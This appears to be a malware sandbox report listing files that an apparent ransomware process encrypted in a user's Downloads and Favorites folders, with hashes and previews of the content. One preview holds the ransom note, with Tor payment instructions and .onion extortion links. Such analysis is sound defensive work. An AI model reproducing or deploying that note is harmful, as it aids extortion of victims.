                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.994896452289026
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:0oOoQ+Oim3ScYwycbFzI/+es1NMMq0NzCwgck38k:TQ+OVjycJvNMMq0NzTEz
                                                                                                                                                      MD5:FA723B24DC63DA4B76B738E575016ACF
                                                                                                                                                      SHA1:119AB3F94170F1522AC82AB09B912A4F378E6E18
                                                                                                                                                      SHA-256:D4AF21470365B82C07B61BB8D10AB09CAA8CCC7F75718D5ABD0558AD04E8CC12
                                                                                                                                                      SHA-512:1B6956DA227EC38B4415B8F214F857EBAD0537DF1D8164965A9DDBD645D2D062BD8E0E6FE6F5C9F5E49B8B3D64D4A8B2519E3690CDC0970BFC7BF0A6D0C2ED2E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: fa.U....s._o.g>.E..I.......J._<(L.x)..].(.5Y.\.7S.q.Q.Q..IP.*..W.W-).#...).t.dC.....<V.....K..".*.4$............;W....L.C<.W......i*..I.w.P?..j.V[z......T.)U..z...?_9...vW..V..7q..RR....._*....C..F..\.bB.........7...[.!|..k_...F~.....I. ....z.(>R...y.)sYh.Ue....R...].`T7D..~..e..<:.I.=/L..y6z....D..8.-UAc.....>......p.hH._..-.L.b............3%+~9.h.G.&..Z.2...}....18.AG..T..E..n|(..+..1.HB6/B8...J...*{..C7...01.s...~.H%.(\j........:...>"..&.Lu\..?...LQ.`>}.<.P..@......S.)....1..q$..?.3Pw[.z#....L.....2....K.....z{1....a....S.G.q...l..:.i..].....7d?qB..,N.l...Q.`V.K......].4...7\..\5...KtJ.)..T.R..j3.p@......'*j..X..[~.......Gl.......d....-c....B0z.......q... ....U....\.`..@..G3..T.+e......v..0....s.)P.Z......`...Z.3.L......QHt.j...w.s?.d.7.FVK.Pd...........){....x.3.........5K.~Wy@UH.}....}H...e..eC^.bS..s.._....m...b.re.Dc.....=....Z.z.....n...~.*.t3y..%p:27.P.^. .Ww.).R....L.h..Bjv.aS.....<.ar..DM..|...1..Q.k~...d.z..ty\-....O.s
                                                                                                                                                      C:\Users\user\Downloads\NVWZAPQSQL.xlsx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.9997900512727975
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:g1eiD0nzDZ5zclAnoFkiWLABcX+7CJ+f6BjBXOKN32J5/+tmyoAN1kxzK8sevWA+:gXonJdi1cWC06BNl2D6mMezCwgck38G
                                                                                                                                                      MD5:4CF37957E9606BF9B6D679FD51DE9C24
                                                                                                                                                      SHA1:8B17F7DB5401B54AAAD4B3BEB59D605494B5C1A1
                                                                                                                                                      SHA-256:DAD517ABFAB2E91EC426BFBC8CFE1E3FF61F58C0A10F2DC369AF91111615E195
                                                                                                                                                      SHA-512:1A76C63C88C1FFCE9FCE238C867FF77CCEF54CDFBDB7A91A1608E4B9072429473CECFD7ABA4C4181E1DCAFFCDD33AFC65E50A57394345140F86BB5922C1C3CF0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: K<sc...%~..{,z).q.....j...Q.l..UEN&e.|.IS^I.#.}.j....)....o..<.$...>.H.}...Ou4 .>1,i_... ..n..]...[.....YCk.{Hb..@... t....v.f.(C~..T...*+.(;..tt...U...M...cK..}...?vuD...N....pt...X..<.)+..m7.w.SJ[h.4......(...... o.&m..;.T.]9...QnJ...L..d=<....V/..x.q.0A..._.~.%E.rz..@Y7...."..<=Y...}...8A....BB...I.}...>.........W....../..).lf.s.L..V.^]|..8......FkK...i.#.I..w......p.1S..\1.Js.xJ.^.)3Q....3L.....f...X...t....'..Y...HV...\V.8..N....OXE.JX...c[X...:..D..G..h.k.Y...Ck..4.....0....v....Xz......l.zm.M>....Y..,...].x."N..x.U+d.A..'k...Usl=S........y.m.,. sm!.".)];w......-8Q..........Z...xi.DY4...U?..D9O..]x&.m.fw.!g.+n"...9......u.+.i....!p.....P.W....y...d.......c..=.s.>.?!|1Q..(.=.....`...z.q.....)..U.....;I*5..9..../.]d...1x.p....k....J/1U44.*..KN...j..Z../.V......=,..%.+.W..A.y...X...dNT.`^0.7.n...?c...=.....}..............Z..\E]1.|...r,....F4.c.Py.U...[.5...K.;g.E..A.U..6.6..8|+..k?n5.E,>.B.8ws.-... R4!.Mp........o..........xB..".
                                                                                                                                                      C:\Users\user\Downloads\NVWZAPQSQL.xlsx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.9997900512727975
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:g1eiD0nzDZ5zclAnoFkiWLABcX+7CJ+f6BjBXOKN32J5/+tmyoAN1kxzK8sevWA+:gXonJdi1cWC06BNl2D6mMezCwgck38G
                                                                                                                                                      MD5:4CF37957E9606BF9B6D679FD51DE9C24
                                                                                                                                                      SHA1:8B17F7DB5401B54AAAD4B3BEB59D605494B5C1A1
                                                                                                                                                      SHA-256:DAD517ABFAB2E91EC426BFBC8CFE1E3FF61F58C0A10F2DC369AF91111615E195
                                                                                                                                                      SHA-512:1A76C63C88C1FFCE9FCE238C867FF77CCEF54CDFBDB7A91A1608E4B9072429473CECFD7ABA4C4181E1DCAFFCDD33AFC65E50A57394345140F86BB5922C1C3CF0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: K<sc...%~..{,z).q.....j...Q.l..UEN&e.|.IS^I.#.}.j....)....o..<.$...>.H.}...Ou4 .>1,i_... ..n..]...[.....YCk.{Hb..@... t....v.f.(C~..T...*+.(;..tt...U...M...cK..}...?vuD...N....pt...X..<.)+..m7.w.SJ[h.4......(...... o.&m..;.T.]9...QnJ...L..d=<....V/..x.q.0A..._.~.%E.rz..@Y7...."..<=Y...}...8A....BB...I.}...>.........W....../..).lf.s.L..V.^]|..8......FkK...i.#.I..w......p.1S..\1.Js.xJ.^.)3Q....3L.....f...X...t....'..Y...HV...\V.8..N....OXE.JX...c[X...:..D..G..h.k.Y...Ck..4.....0....v....Xz......l.zm.M>....Y..,...].x."N..x.U+d.A..'k...Usl=S........y.m.,. sm!.".)];w......-8Q..........Z...xi.DY4...U?..D9O..]x&.m.fw.!g.+n"...9......u.+.i....!p.....P.W....y...d.......c..=.s.>.?!|1Q..(.=.....`...z.q.....)..U.....;I*5..9..../.]d...1x.p....k....J/1U44.*..KN...j..Z../.V......=,..%.+.W..A.y...X...dNT.`^0.7.n...?c...=.....}..............Z..\E]1.|...r,....F4.c.Py.U...[.5...K.;g.E..A.U..6.6..8|+..k?n5.E,>.B.8ws.-... R4!.Mp........o..........xB..".
                                                                                                                                                      C:\Users\user\Downloads\PALRGUCVEH.mp3
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.019003514055122
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:H/fGtwdmfWUW94IV4IQwVMmTNzCwgck38bQ:H/OgGvW2wQyMeNzTEgQ
                                                                                                                                                      MD5:A393EC7407C40581161C0C00CDF978D4
                                                                                                                                                      SHA1:C36753203B75CB37F36DAF7A5E05E14ADA7B7F72
                                                                                                                                                      SHA-256:77BE3FED89EBC01A510AAD0DEC2ADF78FFF61B46A46BBFB1853254844B13E1C4
                                                                                                                                                      SHA-512:28152C688594EAB38C5D8DEF4C3963164D4E8EDD3A73D5C9789ED8A0679A313F72CB3C8BA2F1883A6EE39B06DF478B884C47EE93F377BBD7DB710DC852BC6B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: S.Qi........da..]...4S...8.M.......8.%.....OU2..s....d......(F....V#..hT.l....f.e.ym.....@F.-..s...'(..!.q.N.....gba...'...%...F~..}...P.p....]@B.....V+}._*,....Q..p..ha......s^.uI........=.nG...I..()1...~A.t...j..-l..|V.zt.......S...J.]Sh...E...D.`.n........?..E.w......?.1...>.......R.....O@H'..WY......'.....Jn.J@+...d.T.=.d.`.%.Z].tKn..(...4.p;@M2}4..H.Y.5..U......)..E=.....U....8.......D..h......s.>..K.NMF...DZH:.]"b...~+.HB..BH.n6....4N..........S..3_b...\....QcH.....9..../T.o'.\k......z.....1J...^q...d4(D..<,A....,.w..L./.d.]c...M...nw....7.s..@.i.f>(...A.../.H....T.;..o....6..........?.w....f..#4.9.n.r....".I.J(.B.>V...U.^@.a...A..U......1w...%...m...{..q7....m.q...%WTB..x.......P+.2....+y.}...h..q...y...u..).#.~.tE..Q...-...o..}zy...6*.{]..;...*V...^.JGo.}..N...O.WjK...*i$..$.q.|....w..........P.U.$:_.F<..i.=..=,..nT.%OA..t...m&WeIY.\Z...k...U!|..l]r.x.8....b.P.#...E]B.8J.1eYow..4.l....Q.Jw....~)...+{.R.t...R..r&..$X..
                                                                                                                                                      C:\Users\user\Downloads\PALRGUCVEH.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.019003514055122
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:H/fGtwdmfWUW94IV4IQwVMmTNzCwgck38bQ:H/OgGvW2wQyMeNzTEgQ
                                                                                                                                                      MD5:A393EC7407C40581161C0C00CDF978D4
                                                                                                                                                      SHA1:C36753203B75CB37F36DAF7A5E05E14ADA7B7F72
                                                                                                                                                      SHA-256:77BE3FED89EBC01A510AAD0DEC2ADF78FFF61B46A46BBFB1853254844B13E1C4
                                                                                                                                                      SHA-512:28152C688594EAB38C5D8DEF4C3963164D4E8EDD3A73D5C9789ED8A0679A313F72CB3C8BA2F1883A6EE39B06DF478B884C47EE93F377BBD7DB710DC852BC6B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: S.Qi........da..]...4S...8.M.......8.%.....OU2..s....d......(F....V#..hT.l....f.e.ym.....@F.-..s...'(..!.q.N.....gba...'...%...F~..}...P.p....]@B.....V+}._*,....Q..p..ha......s^.uI........=.nG...I..()1...~A.t...j..-l..|V.zt.......S...J.]Sh...E...D.`.n........?..E.w......?.1...>.......R.....O@H'..WY......'.....Jn.J@+...d.T.=.d.`.%.Z].tKn..(...4.p;@M2}4..H.Y.5..U......)..E=.....U....8.......D..h......s.>..K.NMF...DZH:.]"b...~+.HB..BH.n6....4N..........S..3_b...\....QcH.....9..../T.o'.\k......z.....1J...^q...d4(D..<,A....,.w..L./.d.]c...M...nw....7.s..@.i.f>(...A.../.H....T.;..o....6..........?.w....f..#4.9.n.r....".I.J(.B.>V...U.^@.a...A..U......1w...%...m...{..q7....m.q...%WTB..x.......P+.2....+y.}...h..q...y...u..).#.~.tE..Q...-...o..}zy...6*.{]..;...*V...^.JGo.}..N...O.WjK...*i$..$.q.|....w..........P.U.$:_.F<..i.=..=,..nT.%OA..t...m&WeIY.\Z...k...U!|..l]r.x.8....b.P.#...E]B.8J.1eYow..4.l....Q.Jw....~)...+{.R.t...R..r&..$X..
                                                                                                                                                      C:\Users\user\Downloads\PALRGUCVEH.pdf
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.000746062397798
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TuYfApHI9aVFtEvPwTRwgPSZ3lFXl3GrUKZttHdFArgzK8sevWAVgKTaCB7RZ0cz:spHEaQvKhPW3lFXl2nXHdSczCwgck38F
                                                                                                                                                      MD5:C61BD2D779E7387237DEB6AE5E1672A0
                                                                                                                                                      SHA1:098E2C343F4F2CC722BE41CA3E5B862453750C4E
                                                                                                                                                      SHA-256:E27938519AF6E5B0655AF54EDD5477A8EBA2765517486F994C4B71DE414FD3BC
                                                                                                                                                      SHA-512:98D3898C12AFD5D5631EF303C025F7C6B97D2410130353D148756B9F463913F6A513129D1AD2903EF9004B0CD381EA14862800F19F864080DD6D82C2969FF3C9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .@."L.._.vT....c.-......../..F.IN../w.* .....<..:...v"oq..w..t..t.m..T.].....$..05.nO....Q..3g'.`}hw..4M....S/(..C.@Z:.M...EFm*.!k2.z...M.m|..j....I.o.......h.U1j.W..H.A..bs.........."n...~..o...{n.q).X\.@.........J1.].!D..I.#..6.;...tp.1.,.L\.......c..1....3..._..91...?f......V.CxK.x....d....T...r.......`D@.IZ...L81+.........A...*.K.=cM...>.g.T....{..Sx.g#...V....9.F.Y]....,0)>7;2q...e.y.M3.]8........C{..Y[.).L#.(5.C.. .O...(7n....F:b.24..V.c8+.8.lkc;{.~.....|.v.^..&..]9x..*..4....w....;;.Y...q>........#.Bf..D Hb.S...o.W.u.e....+......T"Q.(.-c'.....g..\..~.Z......ky^y...M...K.......Y...bsW.....~W...B..-#o..dX.h...,.IQ..w..........4..$>r.../0.....1_k...b}CK......g.X..?.z...k...D....'..Y...W-.....H8...5.K..X.0.E...Z,.._.e...H...O..G=..\F.?......6...U...cT..};=.....=H.5.O.....yn..}\.+A.....H....AQ.1.9}.........o...1..F...t.....h....~t..#...m..n..1..5.....o;.~.".+.@......i....=v.}P..cX........tP....h...$.....P.J..#..=..........X65...
                                                                                                                                                      C:\Users\user\Downloads\PALRGUCVEH.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.000746062397798
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TuYfApHI9aVFtEvPwTRwgPSZ3lFXl3GrUKZttHdFArgzK8sevWAVgKTaCB7RZ0cz:spHEaQvKhPW3lFXl2nXHdSczCwgck38F
                                                                                                                                                      MD5:C61BD2D779E7387237DEB6AE5E1672A0
                                                                                                                                                      SHA1:098E2C343F4F2CC722BE41CA3E5B862453750C4E
                                                                                                                                                      SHA-256:E27938519AF6E5B0655AF54EDD5477A8EBA2765517486F994C4B71DE414FD3BC
                                                                                                                                                      SHA-512:98D3898C12AFD5D5631EF303C025F7C6B97D2410130353D148756B9F463913F6A513129D1AD2903EF9004B0CD381EA14862800F19F864080DD6D82C2969FF3C9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .@."L.._.vT....c.-......../..F.IN../w.* .....<..:...v"oq..w..t..t.m..T.].....$..05.nO....Q..3g'.`}hw..4M....S/(..C.@Z:.M...EFm*.!k2.z...M.m|..j....I.o.......h.U1j.W..H.A..bs.........."n...~..o...{n.q).X\.@.........J1.].!D..I.#..6.;...tp.1.,.L\.......c..1....3..._..91...?f......V.CxK.x....d....T...r.......`D@.IZ...L81+.........A...*.K.=cM...>.g.T....{..Sx.g#...V....9.F.Y]....,0)>7;2q...e.y.M3.]8........C{..Y[.).L#.(5.C.. .O...(7n....F:b.24..V.c8+.8.lkc;{.~.....|.v.^..&..]9x..*..4....w....;;.Y...q>........#.Bf..D Hb.S...o.W.u.e....+......T"Q.(.-c'.....g..\..~.Z......ky^y...M...K.......Y...bsW.....~W...B..-#o..dX.h...,.IQ..w..........4..$>r.../0.....1_k...b}CK......g.X..?.z...k...D....'..Y...W-.....H8...5.K..X.0.E...Z,.._.e...H...O..G=..\F.?......6...U...cT..};=.....=H.5.O.....yn..}\.+A.....H....AQ.1.9}.........o...1..F...t.....h....~t..#...m..n..1..5.....o;.~.".+.@......i....=v.}P..cX........tP....h...$.....P.J..#..=..........X65...
                                                                                                                                                      C:\Users\user\Downloads\desktop.ini
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1232
                                                                                                                                                      Entropy (8bit):5.975906355945897
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:PPV8oSualW3fBpU+kzK8sevWAVgKTaCB7RZ0cHYIgtyUzd:PPV8oSbGBu7zCwgck38U
                                                                                                                                                      MD5:30E553911229CA959A40EAE006B8D12A
                                                                                                                                                      SHA1:2B2C75E0050AFEE8C17A79AFF909540C29B96DA5
                                                                                                                                                      SHA-256:4CF8651FD5C4BC9A76D7ACC6E611C1A84F57C822C752C153B769B272FC373449
                                                                                                                                                      SHA-512:39094D756C378F6FA33B87F5F8B7A220AD3A73666BDE15AB56E11E62615AD4D330BCBF98E1F10518EB5B793B3D4C844ED70CECF90DFDDE93713ECFF26137F45D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .y......;._&.d_|..[.W*}/...X..&-_.h...g.T.Vs..V....%.~.....&....L..>fC.b........'.p#S...u.v.../n.!......,w..R..8n.......l.L..k.U!...8h\....`4...K....mN.....T.^K.lv.^.....ma.|.V.M5.O.r...{.....~..m...D.0....s7...P.P..De4$..s.y.P.......MZ."}].yI.].3.b..8.Y.8.b.)..9U..._...j.a:....k.........J|.[.!qn.I....}..&.vBu..r..^.f.O/M......e.........%.......F-X.s..X_/..P...An.n.-.h...`dS.~...|..1e@. J....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC
                                                                                                                                                      C:\Users\user\Downloads\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1232
                                                                                                                                                      Entropy (8bit):5.975906355945897
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:PPV8oSualW3fBpU+kzK8sevWAVgKTaCB7RZ0cHYIgtyUzd:PPV8oSbGBu7zCwgck38U
                                                                                                                                                      MD5:30E553911229CA959A40EAE006B8D12A
                                                                                                                                                      SHA1:2B2C75E0050AFEE8C17A79AFF909540C29B96DA5
                                                                                                                                                      SHA-256:4CF8651FD5C4BC9A76D7ACC6E611C1A84F57C822C752C153B769B272FC373449
                                                                                                                                                      SHA-512:39094D756C378F6FA33B87F5F8B7A220AD3A73666BDE15AB56E11E62615AD4D330BCBF98E1F10518EB5B793B3D4C844ED70CECF90DFDDE93713ECFF26137F45D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .y......;._&.d_|..[.W*}/...X..&-_.h...g.T.Vs..V....%.~.....&....L..>fC.b........'.p#S...u.v.../n.!......,w..R..8n.......l.L..k.U!...8h\....`4...K....mN.....T.^K.lv.^.....ma.|.V.M5.O.r...{.....~..m...D.0....s7...P.P..De4$..s.y.P.......MZ."}].yI.].3.b..8.Y.8.b.)..9U..._...j.a:....k.........J|.[.!qn.I....}..&.vBu..r..^.f.O/M......e.........%.......F-X.s..X_/..P...An.n.-.h...`dS.~...|..1e@. J....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC
                                                                                                                                                      C:\Users\user\Downloads\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Favorites\Amazon.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.3597704674921625
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:6FCCOCf5dzK8sevWAVgKTaCB7RZ0cHYIgtyUzLH0:6HOCf5dzCwgck38s0
                                                                                                                                                      MD5:BC266A24A2AD92BC852B354502BFEAEA
                                                                                                                                                      SHA1:0ADB54F4115A710911BB42FC4C4996C269CF8A85
                                                                                                                                                      SHA-256:D16ACCC1F94B792345BB86E96C1D9FEFB1F080CF6F61878EA8637069F3F0FF5C
                                                                                                                                                      SHA-512:41FD0A3997EBD3EB47AEF216DA593A7ACEE089F7B2A72F00F5CBBA1453162DE5B9719F7C19E0036A92E2E5003CDBDAF262A14E66804F5DEE30E5ADF137E0726B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 0..D...R ..BB.I.H.{.O.?i]..v.`._~.....T0...S......L....E+...=..FT...q.R.5.V7...z9.......T...3z*H.;5.........\.q.^.|......i.s.M5."=4 ...C....Z.F.v.....S}.e~;....e..h...;.k".....b|.K.VA}0...]...MR.IKb....vy..Wc...!=^H.g.b..^9*g....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Amazon.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.3597704674921625
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:6FCCOCf5dzK8sevWAVgKTaCB7RZ0cHYIgtyUzLH0:6HOCf5dzCwgck38s0
                                                                                                                                                      MD5:BC266A24A2AD92BC852B354502BFEAEA
                                                                                                                                                      SHA1:0ADB54F4115A710911BB42FC4C4996C269CF8A85
                                                                                                                                                      SHA-256:D16ACCC1F94B792345BB86E96C1D9FEFB1F080CF6F61878EA8637069F3F0FF5C
                                                                                                                                                      SHA-512:41FD0A3997EBD3EB47AEF216DA593A7ACEE089F7B2A72F00F5CBBA1453162DE5B9719F7C19E0036A92E2E5003CDBDAF262A14E66804F5DEE30E5ADF137E0726B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 0..D...R ..BB.I.H.{.O.?i]..v.`._~.....T0...S......L....E+...=..FT...q.R.5.V7...z9.......T...3z*H.;5.........\.q.^.|......i.s.M5."=4 ...C....Z.F.v.....S}.e~;....e..h...;.k".....b|.K.VA}0...]...MR.IKb....vy..Wc...!=^H.g.b..^9*g....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Bing.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1152
                                                                                                                                                      Entropy (8bit):5.736386780638342
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:D3K8SYq5LF/hp3bbzK8sevWAVgKTaCB7RZ0cHYIgtyUzSGy:D3j1qdBhpXzCwgck389J
                                                                                                                                                      MD5:2AC5172C95BDFAAA5D232806C3F48A3D
                                                                                                                                                      SHA1:520862946E5BD53BACAD8FE32EB6534DD11EC5FB
                                                                                                                                                      SHA-256:3CD3F4689C04657C64144BA8B7C7947395A6D498C1E36C6AFF39B623B736C7EA
                                                                                                                                                      SHA-512:30E2F66B2F367BBF94A8F600836A8BC2CB4D159E84A5EADFDACDDD52F18198320AD02BAC0D43B4561BB52F354CD9A1C9AB480901BDF942BA774D879C46CB0208
                                                                                                                                                      Malicious:false
